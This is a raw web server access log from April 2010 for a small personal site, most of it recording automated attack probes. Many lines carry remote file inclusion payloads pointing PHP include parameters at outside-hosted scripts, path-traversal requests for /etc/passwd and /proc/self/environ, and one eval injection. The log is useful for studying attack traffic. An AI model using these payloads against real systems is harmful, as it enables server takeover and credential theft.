72.52.203.55 - - [25/Apr/2010:04:48:51 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
72.52.203.55 - - [25/Apr/2010:04:48:51 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
72.52.203.55 - - [25/Apr/2010:04:48:51 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
69.57.164.32 - - [25/Apr/2010:04:49:15 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck"
69.57.164.32 - - [25/Apr/2010:04:49:15 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2"
69.57.164.32 - - [25/Apr/2010:04:49:15 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
207.46.195.242 - - [25/Apr/2010:04:49:55 -0500] "GET /logs/access_log.1160956800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
77.92.94.85 - - [25/Apr/2010:04:49:59 -0500] "GET /logs//include.php?path[docroot]=http://77.92.94.85/id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
77.92.94.85 - - [25/Apr/2010:04:49:59 -0500] "GET //include.php?path[docroot]=http://77.92.94.85/id.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
77.92.94.85 - - [25/Apr/2010:04:49:59 -0500] "GET /logs/access_log.1212969600//include.php?path[docroot]=http://77.92.94.85/id.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
195.216.234.1 - - [25/Apr/2010:04:51:38 -0500] "GET /logs/access_log.1268611200///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1"
195.216.234.1 - - [25/Apr/2010:04:51:38 -0500] "GET ///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck"
195.216.234.1 - - [25/Apr/2010:04:51:38 -0500] "GET /logs///index.php?option=com_myblog&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
67.195.112.180 - - [25/Apr/2010:04:51:59 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
213.251.189.205 - - [25/Apr/2010:04:55:19 -0500] "GET /wp-content/plugins/wp-lytebox/main.php?pg=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
213.251.189.205 - - [25/Apr/2010:04:55:19 -0500] "GET /logs/wp-content/plugins/wp-lytebox/main.php?pg=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
213.251.189.205 - - [25/Apr/2010:04:55:20 -0500] "GET /wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
213.251.189.205 - - [25/Apr/2010:04:55:20 -0500] "GET /logs/wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 327 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
213.251.189.205 - - [25/Apr/2010:04:55:20 -0500] "GET /wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 322 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
213.251.189.205 - - [25/Apr/2010:04:55:20 -0500] "GET /logs/wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 327 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
213.251.189.205 - - [25/Apr/2010:04:55:20 -0500] "GET /errors.php?error=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
213.251.189.205 - - [25/Apr/2010:04:55:21 -0500] "GET /logs/errors.php?error=http://www.cram.pt/form/danger.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.16) Gecko/2009121601 Ubuntu/8.10 (intrepid) Firefox/3.0.16"
207.46.13.137 - - [25/Apr/2010:05:04:55 -0500] "GET /logs/access_log.1163548800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.187 - - [25/Apr/2010:05:08:55 -0500] "GET /logs/access_log.1182643200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [25/Apr/2010:05:13:27 -0500] "GET /logs/access_log.1257292800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
122.199.140.158 - - [25/Apr/2010:05:16:38 -0500] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
122.199.140.158 - - [25/Apr/2010:05:16:38 -0500] "GET /logs/access_log.1220054400/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
122.199.140.158 - - [25/Apr/2010:05:16:43 -0500] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://maison-radieuse.ath.cx/calendrier/translations/Taiwan.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:05:21:20 -0500] "GET //poll/poll_ssi.php?include_path=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:05:21:20 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:05:21:20 -0500] "GET /logs/access_log.1268956800%20%20//poll/poll_ssi.php?include_path=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:05:21:36 -0500] "GET /logs/access_log.1270684800%20%20//poll/poll_ssi.php?include_path=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
89.111.176.206 - - [25/Apr/2010:05:22:21 -0500] "GET /index.php?option=com_letterman&Itemid=&mosConfig.absolute.path=http://www.ogc.gen.tr/alb.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
213.189.224.16 - - [25/Apr/2010:05:22:35 -0500] "GET /logs//poll/poll_ssi.php?include_path=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:05:22:35 -0500] "GET //poll/poll_ssi.php?include_path=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:05:22:35 -0500] "GET /logs/access_log.1268956800%20%20//poll/poll_ssi.php?include_path=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
213.189.224.16 - - [25/Apr/2010:05:22:39 -0500] "GET /logs/access_log.1270684800%20%20//poll/poll_ssi.php?include_path=http://come.kr/calendar315/plan/zfxid1.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
72.233.57.242 - - [25/Apr/2010:05:24:11 -0500] "GET /logs/access_log.1268870400/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 371 "-""Mozilla/5.0"
72.233.57.242 - - [25/Apr/2010:05:24:11 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
72.233.57.242 - - [25/Apr/2010:05:24:11 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
121.190.102.21 - - [25/Apr/2010:05:25:17 -0500] "GET //login.php?dir=http://www.pointcominfo.com/phpBB2/id1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
121.190.102.21 - - [25/Apr/2010:05:25:17 -0500] "GET /logs//login.php?dir=http://www.pointcominfo.com/phpBB2/id1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
121.190.102.21 - - [25/Apr/2010:05:25:17 -0500] "GET /logs/access_log.1219363200%20%20//login.php?dir=http://www.pointcominfo.com/phpBB2/id1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
72.233.57.242 - - [25/Apr/2010:05:25:38 -0500] "GET /logs/access_log.1268611200/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 371 "-""Mozilla/5.0"
72.233.57.242 - - [25/Apr/2010:05:27:45 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
72.233.57.242 - - [25/Apr/2010:05:27:45 -0500] "GET /logs/access_log.1268611200%20%20/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
72.233.57.242 - - [25/Apr/2010:05:27:46 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
72.233.57.242 - - [25/Apr/2010:05:28:01 -0500] "GET /logs/access_log.1268611200%20%20/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 373 "-""Mozilla/5.0"
72.233.57.242 - - [25/Apr/2010:05:28:01 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
72.233.57.242 - - [25/Apr/2010:05:28:01 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.abi.co.uk/includes/js/calendar/.id1.txt? HTTP/1.1" 404 349 "-""Mozilla/5.0"
121.190.102.21 - - [25/Apr/2010:05:28:27 -0500] "GET /logs//login.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 299 "-""Mozilla/5.0"
121.190.102.21 - - [25/Apr/2010:05:28:27 -0500] "GET /logs/access_log.1219363200%20%20//login.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
121.190.102.21 - - [25/Apr/2010:05:28:27 -0500] "GET //login.php?dir=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 294 "-""Mozilla/5.0"
121.190.102.21 - - [25/Apr/2010:05:28:31 -0500] "GET /logs//login.php?dir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 299 "-""Mozilla/5.0"
121.190.102.21 - - [25/Apr/2010:05:28:31 -0500] "GET //login.php?dir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 294 "-""Mozilla/5.0"
121.190.102.21 - - [25/Apr/2010:05:28:31 -0500] "GET /logs/access_log.1219363200%20%20//login.php?dir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
195.160.224.208 - - [25/Apr/2010:05:28:37 -0500] "GET /logs/access_log.1219708800///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 322 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
195.160.224.208 - - [25/Apr/2010:05:29:01 -0500] "GET /logs///index.php?option=com_mp3_allopass&Itemid=1&task=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 300 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/"
207.46.199.42 - - [25/Apr/2010:05:34:25 -0500] "GET /logs/access_log.1236729600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
174.123.79.74 - - [25/Apr/2010:05:36:58 -0500] "GET //administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://www.visitbrooklyn.org//images/home/tmp/id2.txt? HTTP/1.1" 404 345 "-""Mozilla/5.0"
174.123.79.74 - - [25/Apr/2010:05:36:58 -0500] "GET /logs/access_log.1268956800%20%20//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://www.visitbrooklyn.org//images/home/tmp/id2.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
174.123.79.74 - - [25/Apr/2010:05:36:58 -0500] "GET /logs//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://www.visitbrooklyn.org//images/home/tmp/id2.txt? HTTP/1.1" 404 350 "-""Mozilla/5.0"
174.123.79.74 - - [25/Apr/2010:05:37:17 -0500] "GET /logs/access_log.1270684800%20%20//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://www.visitbrooklyn.org//images/home/tmp/id2.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
212.241.177.123 - - [25/Apr/2010:05:37:50 -0500] "GET //administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
212.241.177.123 - - [25/Apr/2010:05:37:50 -0500] "GET /logs//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
212.241.177.123 - - [25/Apr/2010:05:37:50 -0500] "GET /logs/access_log.1268956800%20%20//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 374 "-""Mozilla/5.0"
212.241.177.123 - - [25/Apr/2010:05:39:21 -0500] "GET /logs/access_log.1270684800%20%20//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 374 "-""Mozilla/5.0"
174.123.79.74 - - [25/Apr/2010:05:41:58 -0500] "GET /logs/access_log.1268956800//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://www.visitbrooklyn.org//images/home/tmp/id2.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
174.123.79.74 - - [25/Apr/2010:05:42:21 -0500] "GET /logs/access_log.1270684800//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://www.visitbrooklyn.org//images/home/tmp/id2.txt? HTTP/1.1" 404 372 "-""Mozilla/5.0"
89.111.176.206 - - [25/Apr/2010:05:44:44 -0500] "GET /logs/access_log.1219708800/index.php?option=com_letterman&Itemid=&mosConfig.absolute.path=http://www.ogc.gen.tr/alb.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
89.111.176.206 - - [25/Apr/2010:05:44:45 -0500] "GET /logs/index.php?option=com_letterman&Itemid=&mosConfig.absolute.path=http://www.ogc.gen.tr/alb.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
62.140.247.10 - - [25/Apr/2010:05:44:54 -0500] "GET /logs/access_log.1270598400/components/com_flyspray/startdown.php?file=http://www.2kiev.com.ua/images/id.png? HTTP/1.1" 404 348 "-""Mozilla/5.0"
62.140.247.10 - - [25/Apr/2010:05:44:54 -0500] "GET /components/com_flyspray/startdown.php?file=http://www.2kiev.com.ua/images/id.png? HTTP/1.1" 404 321 "-""Mozilla/5.0"
62.140.247.10 - - [25/Apr/2010:05:44:54 -0500] "GET /logs/components/com_flyspray/startdown.php?file=http://www.2kiev.com.ua/images/id.png? HTTP/1.1" 404 326 "-""Mozilla/5.0"
62.140.247.10 - - [25/Apr/2010:05:45:14 -0500] "GET /components/com_flyspray/startdown.php?file=http://www.2kiev.com.ua/images/id.png? HTTP/1.1" 404 321 "-""Mozilla/5.0"
62.140.247.10 - - [25/Apr/2010:05:45:14 -0500] "GET /logs/components/com_flyspray/startdown.php?file=http://www.2kiev.com.ua/images/id.png? HTTP/1.1" 404 326 "-""Mozilla/5.0"
62.140.247.10 - - [25/Apr/2010:05:45:14 -0500] "GET /logs/access_log.1270598400/components/com_flyspray/startdown.php?file=http://www.2kiev.com.ua/images/id.png? HTTP/1.1" 404 348 "-""Mozilla/5.0"
89.111.176.206 - - [25/Apr/2010:05:46:12 -0500] "GET /logs/access_log.1220054400/index.php?option=com_letterman&Itemid=&mosConfig.absolute.path=http://www.ogc.gen.tr/alb.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
118.217.216.132 - - [25/Apr/2010:05:46:30 -0500] "GET //index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
118.217.216.132 - - [25/Apr/2010:05:46:31 -0500] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
118.217.216.132 - - [25/Apr/2010:05:46:33 -0500] "GET /logs/access_log.1270598400%20%20//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
118.217.216.132 - - [25/Apr/2010:05:47:11 -0500] "GET //index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
118.217.216.132 - - [25/Apr/2010:05:47:12 -0500] "GET /logs//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
212.241.177.123 - - [25/Apr/2010:05:47:13 -0500] "GET /logs/access_log.1268956800//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
118.217.216.132 - - [25/Apr/2010:05:47:13 -0500] "GET /logs/access_log.1270598400%20%20//index.php?option=com_fabrik&Itemid=&mosConfig.absolute.path=http://bboards.co.nz////data/file//music_skin/id1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
213.172.38.2 - - [25/Apr/2010:05:47:49 -0500] "GET /logs/access_log.1268611200%20%20//bbs//bbs////delete_comment.php?board_skin_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
213.172.38.2 - - [25/Apr/2010:05:47:49 -0500] "GET /logs//bbs//bbs////delete_comment.php?board_skin_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
213.172.38.2 - - [25/Apr/2010:05:47:49 -0500] "GET //bbs//bbs////delete_comment.php?board_skin_path=http://www.1000descuentos.com/includes/id.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
212.241.177.123 - - [25/Apr/2010:05:47:55 -0500] "GET /logs/access_log.1270684800//administrator/components/com_booklibrary/doc/releasenote.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
121.78.118.123 - - [25/Apr/2010:05:48:14 -0500] "GET //conlib/local.php?cfg[path][contenido]=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 301 "-""Mozilla/5.0"
121.78.118.123 - - [25/Apr/2010:05:48:14 -0500] "GET /logs//conlib/local.php?cfg[path][contenido]=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 306 "-""Mozilla/5.0"
121.78.118.123 - - [25/Apr/2010:05:48:14 -0500] "GET /logs/access_log.1262563200//conlib/local.php?cfg[path][contenido]=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
121.78.118.123 - - [25/Apr/2010:05:48:17 -0500] "GET /logs//conlib/local.php?cfg[path][contenido]=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 306 "-""Mozilla/5.0"
121.78.118.123 - - [25/Apr/2010:05:48:18 -0500] "GET //conlib/local.php?cfg[path][contenido]=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 301 "-""Mozilla/5.0"
121.78.118.123 - - [25/Apr/2010:05:48:18 -0500] "GET /logs/access_log.1262563200//conlib/local.php?cfg[path][contenido]=http://www.empcl.org/Scripts/bogel/id1.txt????? HTTP/1.1" 404 328 "-""Mozilla/5.0"
207.46.13.46 - - [25/Apr/2010:05:49:24 -0500] "GET /logs/access_log.1210723200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.197 - - [25/Apr/2010:05:50:25 -0500] "GET /logs/access_log.1164672000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.45.176.90 - - [25/Apr/2010:05:53:04 -0500] "GET /logs//microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 310 "-""libwww-perl/5.833"
207.45.176.90 - - [25/Apr/2010:05:53:04 -0500] "GET //microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 305 "-""libwww-perl/5.833"
190.152.145.54 - - [25/Apr/2010:05:53:36 -0500] "GET /logs/access_log.1270684800%20%20/playing.php/common/db.php?commonpath=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
190.152.145.54 - - [25/Apr/2010:05:53:36 -0500] "GET /playing.php/common/db.php?commonpath=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
190.152.145.54 - - [25/Apr/2010:05:53:36 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
190.152.145.54 - - [25/Apr/2010:05:53:36 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
190.152.145.54 - - [25/Apr/2010:05:53:36 -0500] "GET /logs/access_log.1270684800%20%20/playing.php/common/db.php?commonpath=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
190.152.145.54 - - [25/Apr/2010:05:53:36 -0500] "GET /playing.php/common/db.php?commonpath=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
91.121.121.28 - - [25/Apr/2010:05:54:07 -0500] "GET /logs//microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 310 "-""libwww-perl/5.803"
91.121.121.28 - - [25/Apr/2010:05:54:07 -0500] "GET //microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 305 "-""libwww-perl/5.803"
208.127.85.180 - - [25/Apr/2010:05:56:39 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "http://www.google.com/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat6.JPG&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo-order.htm&usg=__dTWna7zfOF9Glbm5Kjzek0uBNb8=&h=246&w=236&sz=19&hl=en&start=217&itbs=1&tbnid=Js0hVP5NTJi0TM:&tbnh=110&tbnw=106&prev=/images%3Fq%3Dvintage%2Btattoo%2Bflash%26start%3D200%26hl%3Den%26sa%3DN%26gbv%3D2%26ndsp%3D20%26tbs%3Disch:1""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
208.127.85.180 - - [25/Apr/2010:05:56:40 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
208.127.85.180 - - [25/Apr/2010:05:56:40 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
208.127.85.180 - - [25/Apr/2010:05:56:40 -0500] "GET /tattoo/tat10.jpg HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
208.127.85.180 - - [25/Apr/2010:05:56:40 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
208.127.85.180 - - [25/Apr/2010:05:56:41 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://tomdolan.pconline.com/tattoo/tattoo-order.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.0.3705; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
190.152.145.54 - - [25/Apr/2010:05:57:49 -0500] "GET /playing.php/common/db.php?commonpath=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
190.152.145.54 - - [25/Apr/2010:05:57:49 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://www.abi.co.uk/cok1.txt? HTTP/1.1" 404 314 "-""Mozilla/5.0"
